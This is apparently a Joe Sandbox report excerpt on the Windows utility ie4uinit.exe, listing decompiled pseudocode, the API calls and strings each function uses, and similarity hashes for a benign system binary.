				 *((intOrPtr*)(_t119 + 0x30)) =  *((intOrPtr*)(0x319e5500 + 0x18 + _t110 * 8));
				 *((intOrPtr*)(_t119 + 0x28)) = _t72;
				_t104 =  !=  ? _t129 : L" -extoff";
				 *((intOrPtr*)(_t119 + 0x20)) = r14d;
				_t39 = _t116 + 0x150; // -2222
				_t40 = _t116 + 0x570; // -1166
				E00007FF77FF7319C3964(_t56, _t40,  !=  ? _t129 : L" -extoff", _t39,  *((intOrPtr*)(0x319e5500 + 0x20 + _t110 * 8)));
				goto 0x319c43de;
				_t41 = _t116 + 0x150; // -2222
				_t42 = _t119 + 0x40; // -30
				E00007FF77FF7319C1310(_t83, _t42, _t83, _t41, __r10);
				_t43 = _t119 + 0x40; // -30
				if (E00007FF77FF7319C894C(0, 0x104, r15d - 3, _t83, _t43, _t113, _t116, _t131, _t129) < 0) goto 0x319c43de;
				r8d = _t72;
				_t44 = _t116 + 0x570; // -1166
				_t45 = _t119 + 0x40; // -30
				E00007FF77FF7319C3D20(_t80 ^ _t119, _t83, _t45, _t44, _t128);
				r8d = _t72;
				_t46 = _t116 + 0x780; // -638
				_t47 = _t119 + 0x40; // -30
				return E00007FF77FF7319E38D0(E00007FF77FF7319C3D20(_t80 ^ _t119, _t83, _t47, _t46, _t128), 0,  *(_t116 + 0x990) ^ _t119);
			}

0x7ff7319c4244
0x7ff7319c4244
0x7ff7319c4244
0x7ff7319c4254
0x7ff7319c4254
0x7ff7319c425c
0x7ff7319c4263
0x7ff7319c426d
0x7ff7319c427e
0x7ff7319c4281
0x7ff7319c4284
0x7ff7319c4287
0x7ff7319c4293
0x7ff7319c42a2
0x7ff7319c42aa
0x7ff7319c42af
0x7ff7319c42b6
0x7ff7319c42be
0x7ff7319c42ca
0x7ff7319c42d3
0x7ff7319c42db
0x7ff7319c42dd
0x7ff7319c42e6
0x7ff7319c42eb
0x7ff7319c42f0
0x7ff7319c42f5
0x7ff7319c4301
0x7ff7319c4307
0x7ff7319c430d
0x7ff7319c4314
0x7ff7319c4319
0x7ff7319c431f
0x7ff7319c4326
0x7ff7319c432e
0x7ff7319c4335
0x7ff7319c4347
0x7ff7319c434c
0x7ff7319c4356
0x7ff7319c435e
0x7ff7319c4364
0x7ff7319c436f
0x7ff7319c4373
0x7ff7319c4377
0x7ff7319c437f
0x7ff7319c4386
0x7ff7319c438d
0x7ff7319c4392
0x7ff7319c4394
0x7ff7319c439e
0x7ff7319c43a3
0x7ff7319c43a8
0x7ff7319c43b4
0x7ff7319c43b6
0x7ff7319c43b9
0x7ff7319c43c0
0x7ff7319c43c5
0x7ff7319c43ca
0x7ff7319c43cd
0x7ff7319c43d4
0x7ff7319c4407

APIs

Part of subcall function 00007FF7319C8A08: wcsncmp.MSVCRT ref: 00007FF7319C8A3C

Part of subcall function 00007FF7319C90F4: LocalFree.KERNEL32 ref: 00007FF7319C9312

SHCreateDirectory.SHELL32 ref: 00007FF7319C4301

Part of subcall function 00007FF7319C3D20: GetShortPathNameW.KERNEL32 ref: 00007FF7319C3D69
Part of subcall function 00007FF7319C3D20: GetShortPathNameW.KERNEL32 ref: 00007FF7319C3DB5
Part of subcall function 00007FF7319C3D20: PathFindFileNameW.SHLWAPI ref: 00007FF7319C3DC7
Part of subcall function 00007FF7319C3D20: GetCurrentDirectoryW.KERNEL32 ref: 00007FF7319C3DF4
Part of subcall function 00007FF7319C3D20: SetCurrentDirectoryW.KERNEL32 ref: 00007FF7319C3E05
Part of subcall function 00007FF7319C3D20: FindFirstFileW.KERNEL32 ref: 00007FF7319C3E1F
Part of subcall function 00007FF7319C3D20: CoCreateInstance.OLE32 ref: 00007FF7319C3E55
Part of subcall function 00007FF7319C3D20: StrCmpIW.SHLWAPI ref: 00007FF7319C3EE3

Part of subcall function 00007FF7319C3D20: StrCmpIW.SHLWAPI ref: 00007FF7319C3F0A
Part of subcall function 00007FF7319C3D20: PathRemoveBlanksW.SHLWAPI ref: 00007FF7319C3F42
Part of subcall function 00007FF7319C3D20: StrCmpICW.SHLWAPI ref: 00007FF7319C3F61
Part of subcall function 00007FF7319C3D20: StrCmpICW.SHLWAPI ref: 00007FF7319C3F79
Part of subcall function 00007FF7319C3D20: FindNextFileW.KERNEL32 ref: 00007FF7319C40C3
Part of subcall function 00007FF7319C3D20: FindClose.KERNEL32 ref: 00007FF7319C40F8
Part of subcall function 00007FF7319C3D20: FindFirstFileExW.KERNEL32 ref: 00007FF7319C4159
Part of subcall function 00007FF7319C3D20: lstrcmpW.KERNEL32 ref: 00007FF7319C4177
Part of subcall function 00007FF7319C3D20: lstrcmpW.KERNEL32 ref: 00007FF7319C418C

PathFileExistsW.SHLWAPI ref: 00007FF7319C4356

Part of subcall function 00007FF7319C894C: wcschr.MSVCRT ref: 00007FF7319C89B4

Strings

-extoff, xrefs: 00007FF7319C4368

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: FileFindPath$DirectoryName$CreateCurrentFirstShortlstrcmp$BlanksCloseExistsFreeInstanceLocalNextRemovewcschrwcsncmp
String ID: -extoff
API String ID: 3822344381-2466603806
Opcode ID: 98825ebdb9f31713724772fa53d674ad79bb2e01384ac911a4ea77c056bb291f
Instruction ID: cb93d406349b8810a453c0c331a37a1edc9fa49890e93459932fae65b36eb997
Opcode Fuzzy Hash: 98825ebdb9f31713724772fa53d674ad79bb2e01384ac911a4ea77c056bb291f
Instruction Fuzzy Hash: 16417132F18AC1E6E720EF21D8416EAA724FB84388FC05032DA8D47A9DDF78D605DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CDB6C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

SysFreeString.OLEAUT32 ref: 00007FF7319CDC5D
SysAllocString.OLEAUT32 ref: 00007FF7319CDC66

Part of subcall function 00007FF7319C1440: SysStringLen.OLEAUT32 ref: 00007FF7319C148B

Strings

UE00, xrefs: 00007FF7319CDC51

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$AllocFreeHeapProcess
String ID: UE00
API String ID: 858782919-1381591544
Opcode ID: ef14ff598bbf0e452664927a38ddb3cb18cbf1eb245ee0fa3219198422f07669
Instruction ID: 2de169cb6e6697b10916584b5139d8ba45c1692813682c21db88c79f273f43ae
Opcode Fuzzy Hash: ef14ff598bbf0e452664927a38ddb3cb18cbf1eb245ee0fa3219198422f07669
Instruction Fuzzy Hash: C7318076E08B8592EB14AF25D454369A3A0FB88F88F818135CE8C03759CFBCD445D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CB6D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00007FF77FF7319CB6D4(intOrPtr __eax, long long __rbx, intOrPtr* __rcx, long long __rdi, long long __rsi, long long _a16, long long _a24, long long _a32) {
				void* _v8;
				signed int _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed long long _t47;
				signed long long _t48;
				signed long long _t49;
				void* _t62;
				void* _t63;

				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t62 = _t63;
				_t64 = _t63 - 0x70;
				_t47 =  *0x319f4658; // 0x8be7dd1f02a
				_t48 = _t47 ^ _t63 - 0x00000070;
				_v24 = _t48;
				dil = 0;
				__imp__LocaleNameToLCID();
				__imp__LocaleNameToLCID();
				_v88 = 0x437;
				_v84 = 0x43f;
				_v80 = 0x42b;
				_v72 = 0x419;
				_v68 = 0x819;
				_v64 = 0x440;
				_v60 = 0x428;
				_v56 = 0x442;
				_v52 = 0x843;
				_v48 = 0x443;
				_v44 = 0x41f;
				_v40 = 0x423;
				_v36 = 0x82c;
				_v32 = 0x42c;
				if (__eax ==  *((intOrPtr*)(_t62 + _t48 * 4 - 0x50))) goto 0x319cb7ae;
				_t49 = _t48 + 1;
				if (_t49 - 3 < 0) goto 0x319cb780;
				if (__eax ==  *((intOrPtr*)(_t62 + _t49 * 4 - 0x40))) goto 0x319cb7a2;
				if (_t49 + 1 - 0xb < 0) goto 0x319cb791;
				goto 0x319cb7a5;
				dil = 1;
				if (__rcx == 0) goto 0x319cb7b8;
				 *__rcx = __eax;
				goto 0x319cb7b8;
				dil = 1;
				if (__rcx == 0) goto 0x319cb7b8;
				 *__rcx = __eax;
				return E00007FF77FF7319E38D0(dil, __eax, _v24 ^ _t64);
			}

0x7ff7319cb6d4
0x7ff7319cb6d9
0x7ff7319cb6de
0x7ff7319cb6e4
0x7ff7319cb6e7
0x7ff7319cb6eb
0x7ff7319cb6f2
0x7ff7319cb6f5
0x7ff7319cb700
0x7ff7319cb703
0x7ff7319cb714
0x7ff7319cb71c
0x7ff7319cb725
0x7ff7319cb72c
0x7ff7319cb733
0x7ff7319cb73a
0x7ff7319cb741
0x7ff7319cb748
0x7ff7319cb74f
0x7ff7319cb756
0x7ff7319cb75d
0x7ff7319cb764
0x7ff7319cb76b
0x7ff7319cb772
0x7ff7319cb779
0x7ff7319cb784
0x7ff7319cb786
0x7ff7319cb78d
0x7ff7319cb795
0x7ff7319cb79e
0x7ff7319cb7a0
0x7ff7319cb7a2
0x7ff7319cb7a8
0x7ff7319cb7aa
0x7ff7319cb7ac
0x7ff7319cb7ae
0x7ff7319cb7b4
0x7ff7319cb7b6
0x7ff7319cb7dc

APIs

LocaleNameToLCID.KERNEL32 ref: 00007FF7319CB703
LocaleNameToLCID.KERNEL32 ref: 00007FF7319CB714

Strings

!x-sys-default-locale, xrefs: 00007FF7319CB70B

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: LocaleName
String ID: !x-sys-default-locale
API String ID: 1723996188-2729719199
Opcode ID: 77d2964bf6e634fbe6c46da8917ae11e8ea4680c4c3ebb8b825402650ad88bd9
Instruction ID: 83ec8968a2b43c3afc434b3a37ad2359e4a7a336d3de7a8b44bea656f220f05f
Opcode Fuzzy Hash: 77d2964bf6e634fbe6c46da8917ae11e8ea4680c4c3ebb8b825402650ad88bd9
Instruction Fuzzy Hash: 023168B2E182509EF710DF61E4082AC77E4F70834CF985434DF9A27B88CBB895458B64

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D2A50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E00007FF77FF7319D2A50(void* __rcx, intOrPtr* __rdx, long long __rsi, signed int _a8, long long _a16) {
				signed long long _v24;
				long long _v32;
				intOrPtr _v40;
				signed long long _v48;
				signed int _v56;
				long long _v64;
				signed long long _v72;
				signed long long _v80;
				long long _v88;
				void* __rdi;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t31;
				void* _t36;
				void* _t37;
				void* _t47;
				void* _t56;
				void* _t63;
				long long _t65;
				void* _t67;

				_a16 = __rsi;
				if (r8d != 0) goto 0x319d2a6f;
				goto 0x319d2a7e;
				_t46 =  !=  ? 0x319e8be4 : 0x319ec068;
				_t65 =  *((intOrPtr*)(__rdx + 8));
				_t58 =  *((intOrPtr*)(__rcx + 0x10));
				if (_t65 == 0) goto 0x319d2b31;
				_t30 =  *__rdx;
				if (_t30 == 0) goto 0x319d2b31;
				_v56 = _v56 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				r8d = 1;
				_v24 = _v24 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v40 = _t30;
				_v64 =  &_a8;
				_v72 = _v72 & 0x00000000;
				_v80 = _v80 & 0x00000000;
				_v32 = _t65;
				_v88 =  !=  ? 0x319e8be4 : 0x319ec068;
				if (E00007FF77FF7319D716C(_t29, _t30, _t31, _t36, _t37, _t30, _t47,  *((intOrPtr*)(__rcx + 0x10)),  &_v56, _t56,  *((intOrPtr*)(__rcx + 0x10)), _t63, L"https://ieonline.microsoft.com/EUPP/v1/service?action=downloadcert&appid=Microsoft_IE_EUPP", _t67) < 0) goto 0x319d2b23;
				if (_a8 == 0) goto 0x319d2b1e;
				E00007FF77FF7319D797C(_t31, _t36, _t47,  *_t58, _a8);
				goto 0x319d2b23;
				__imp__#6();
				return 0x80004005;
			}

0x7ff7319d2a50
0x7ff7319d2a64
0x7ff7319d2a6d
0x7ff7319d2a7a
0x7ff7319d2a7e
0x7ff7319d2a87
0x7ff7319d2a8e
0x7ff7319d2a94
0x7ff7319d2a98
0x7ff7319d2a9e
0x7ff7319d2aa8
0x7ff7319d2aae
0x7ff7319d2ab4
0x7ff7319d2aba
0x7ff7319d2ac3
0x7ff7319d2acf
0x7ff7319d2ad7
0x7ff7319d2add
0x7ff7319d2ae3
0x7ff7319d2aef
0x7ff7319d2afd
0x7ff7319d2b08
0x7ff7319d2b15
0x7ff7319d2b1c
0x7ff7319d2b2b
0x7ff7319d2b40

APIs

SysFreeString.OLEAUT32 ref: 00007FF7319D2B2B

Strings

dsp, xrefs: 00007FF7319D2A73
https://ieonline.microsoft.com/EUPP/v1/service?action=downloadcert&appid=Microsoft_IE_EUPP, xrefs: 00007FF7319D2AE8

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: FreeString
String ID: dsp$https://ieonline.microsoft.com/EUPP/v1/service?action=downloadcert&appid=Microsoft_IE_EUPP
API String ID: 3341692771-2070162375
Opcode ID: f2ebcd92e17cde95b4c56e211319ff0c8199f1a47e1738f4427e9bd58a7c66b1
Instruction ID: 4bddb1aa7e992009bd01aafc8c7ce7f5275472a343dfdda89b852aff86f71fd6
Opcode Fuzzy Hash: f2ebcd92e17cde95b4c56e211319ff0c8199f1a47e1738f4427e9bd58a7c66b1
Instruction Fuzzy Hash: 59214C33E1CAC192E760DF00E40476AA364FB85798FA44135D68D4BA58CFBDD845DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C641C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00007FF7319C25CC), ref: 00007FF7319C644E
CoTaskMemFree.OLE32 ref: 00007FF7319C6493

Strings

StartMenuInternet, xrefs: 00007FF7319C6473

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CreateFreeInstanceTask
String ID: StartMenuInternet
API String ID: 1992417041-1263441292
Opcode ID: 3d57a36961733dde3a36942b01dfdcb565751e0e842a8bba9ffe591c66bcfdad
Instruction ID: d15f712b95b709671c15b9ba2227973e5ee7fa58ac124365b4b390482c919a94
Opcode Fuzzy Hash: 3d57a36961733dde3a36942b01dfdcb565751e0e842a8bba9ffe591c66bcfdad
Instruction Fuzzy Hash: E8116036B18B81A1DB009F16E880168F3B9FB84F99B948036CF9C43768DEBED544D760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E0DA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00007FF77FF7319E0DA0(long long __rbx, long long __rcx, signed long long* __r8, void* __r9, long long _a16) {
				signed int _v24;
				char _v552;
				long long _v568;
				void* _t9;
				void* _t10;
				void* _t18;
				void* _t20;
				signed long long _t28;
				void* _t37;
				void* _t39;

				_a16 = __rbx;
				_t28 =  *0x319f4658; // 0x8be7dd1f02a
				_v24 = _t28 ^ _t39 - 0x00000250;
				 *__r8 =  *__r8 & 0x00000000;
				_v568 = __rcx;
				r9d = 0xf0006;
				_t10 = E00007FF77FF7319C1394(_t9,  &_v552, _t37, L"D:(A;;GA;;;SY)(A;;0x%x;;;%s)S:(ML;;1;;;LW)", __r9);
				if (_t10 < 0) goto 0x319e0e24;
				r9d = 0;
				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW();
				if (_t10 != 0) goto 0x319e0e24;
				_t18 =  <=  ? GetLastError() : _t11 & 0x0000ffff | 0x80070000;
				_t19 =  >=  ? 0x80004005 : _t18;
				_t13 =  >=  ? 0x80004005 : _t18;
				return E00007FF77FF7319E38D0( >=  ? 0x80004005 : _t18, _t20, _v24 ^ _t39 - 0x00000250);
			}

0x7ff7319e0da0
0x7ff7319e0dad
0x7ff7319e0db7
0x7ff7319e0dbf
0x7ff7319e0dc6
0x7ff7319e0dd7
0x7ff7319e0de2
0x7ff7319e0deb
0x7ff7319e0ded
0x7ff7319e0dfc
0x7ff7319e0e04
0x7ff7319e0e17
0x7ff7319e0e21
0x7ff7319e0e24
0x7ff7319e0e46

APIs

Part of subcall function 00007FF7319C1394: _vsnwprintf.MSVCRT ref: 00007FF7319C13D4

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF7319E0DFC
GetLastError.KERNEL32 ref: 00007FF7319E0E06

Strings

D:(A;;GA;;;SY)(A;;0x%x;;;%s)S:(ML;;1;;;LW), xrefs: 00007FF7319E0DCB

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: DescriptorSecurity$ConvertErrorLastString_vsnwprintf
String ID: D:(A;;GA;;;SY)(A;;0x%x;;;%s)S:(ML;;1;;;LW)
API String ID: 3097636412-633327700
Opcode ID: 5d7bcdc61ff2071e30052c043dde8b180b2cd11917512c1e8b54faa1ed1eabd2
Instruction ID: 8f8e53dc9f3fa69817a534f038f31c7474c13d4598982d8b97a08585f5c778c0
Opcode Fuzzy Hash: 5d7bcdc61ff2071e30052c043dde8b180b2cd11917512c1e8b54faa1ed1eabd2
Instruction Fuzzy Hash: EF019231F0CBC296E760AB65E9947A6A3D0FF88748F804135DA8D87A48DFBCD404D720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D3254 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21synchronizationCOMMON

Download Yara Rule

APIs

#74.IERTUTIL(?,?,00000000,00007FF7319CD605,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D3266
CreateMutexW.KERNEL32(?,?,00000000,00007FF7319CD605,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D3286

Strings

{5312EE61-79E3-4A24-BFE1-132B85B23C3A}, xrefs: 00007FF7319D3271

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CreateMutex
String ID: {5312EE61-79E3-4A24-BFE1-132B85B23C3A}
API String ID: 1964310414-3805012793
Opcode ID: 38e0ecbed216c7f8256dceb7e245e11f843dbeaa064275fe13cb75f85fc44150
Instruction ID: ca79b5c7d8bf8f7a93557534eaf031b7a8623adfe75a9adebfe6e7e6ce3fef7b
Opcode Fuzzy Hash: 38e0ecbed216c7f8256dceb7e245e11f843dbeaa064275fe13cb75f85fc44150
Instruction Fuzzy Hash: 8FE06D32B08B85A7D708DFA1F980169B3A1FB48744B84C438CA5E43718DF78D4A48714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C2670 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7319C5974: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C59AD
Part of subcall function 00007FF7319C5974: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C5A1F
Part of subcall function 00007FF7319C5974: PostThreadMessageW.USER32 ref: 00007FF7319C5A39

CoInitializeEx.OLE32 ref: 00007FF7319C268E

Part of subcall function 00007FF7319C6B98: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,00007FF7319C269D), ref: 00007FF7319C6BDD
Part of subcall function 00007FF7319C6B98: RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF7319C269D), ref: 00007FF7319C6C02
Part of subcall function 00007FF7319C6B98: RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF7319C269D), ref: 00007FF7319C6C1A
Part of subcall function 00007FF7319C6B98: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,00007FF7319C269D), ref: 00007FF7319C6C54
Part of subcall function 00007FF7319C6B98: RegQueryValueExW.ADVAPI32 ref: 00007FF7319C6C88
Part of subcall function 00007FF7319C6B98: RegCloseKey.ADVAPI32 ref: 00007FF7319C6CA6

Part of subcall function 00007FF7319C53B8: CoInitializeEx.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C25CC), ref: 00007FF7319C53F1
Part of subcall function 00007FF7319C53B8: RegOpenKeyExW.ADVAPI32 ref: 00007FF7319C55B6
Part of subcall function 00007FF7319C53B8: RegOpenKeyExW.ADVAPI32 ref: 00007FF7319C55E9

CoUninitialize.OLE32 ref: 00007FF7319C26AA

Strings

In CmdApplySpadSettingsDuringMigration, xrefs: 00007FF7319C2674

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Open$CloseInitializeMessageQueryValue$FormatLocalPostThreadTimeUninitialize
String ID: In CmdApplySpadSettingsDuringMigration
API String ID: 2480159940-3820774719
Opcode ID: e98719c756ede3558b4148ad2de8e9c457e2ddb86886c7c1663047ac37faa4a8
Instruction ID: 04530a1c9ef61aa24cc8c881df71f9752a224635dc3518dae25f17176107f71d
Opcode Fuzzy Hash: e98719c756ede3558b4148ad2de8e9c457e2ddb86886c7c1663047ac37faa4a8
Instruction Fuzzy Hash: 9EE01A20F0C593A1FB04BB21C8061B9A361AF44758FC08831C08D861AADEACE546EB30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DDEA4 Relevance: 5.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF7319DDEE6
GetLastError.KERNEL32 ref: 00007FF7319DDEF3
GetLastError.KERNEL32 ref: 00007FF7319DDF07

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$ByteCharMultiWide
String ID:
API String ID: 3361762293-0
Opcode ID: c10b244ca7df13b8a8b68ef7ee15e5365b36afd1d30c09e8c4368d1a251849f3
Instruction ID: 9b6fe2e8ec8d7d1eb3d2af475ea116d09edf85cb976ce6a1fd15d718446c7d84
Opcode Fuzzy Hash: c10b244ca7df13b8a8b68ef7ee15e5365b36afd1d30c09e8c4368d1a251849f3
Instruction Fuzzy Hash: 0C118672F18781D5EB106B6AEC94239E3D5AF48B94F948134DA4DC3298DEACE4506720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C80A4 Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7319C80D5
HeapFree.KERNEL32 ref: 00007FF7319C80E3
GetProcessHeap.KERNEL32 ref: 00007FF7319C8101
HeapFree.KERNEL32 ref: 00007FF7319C810F

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
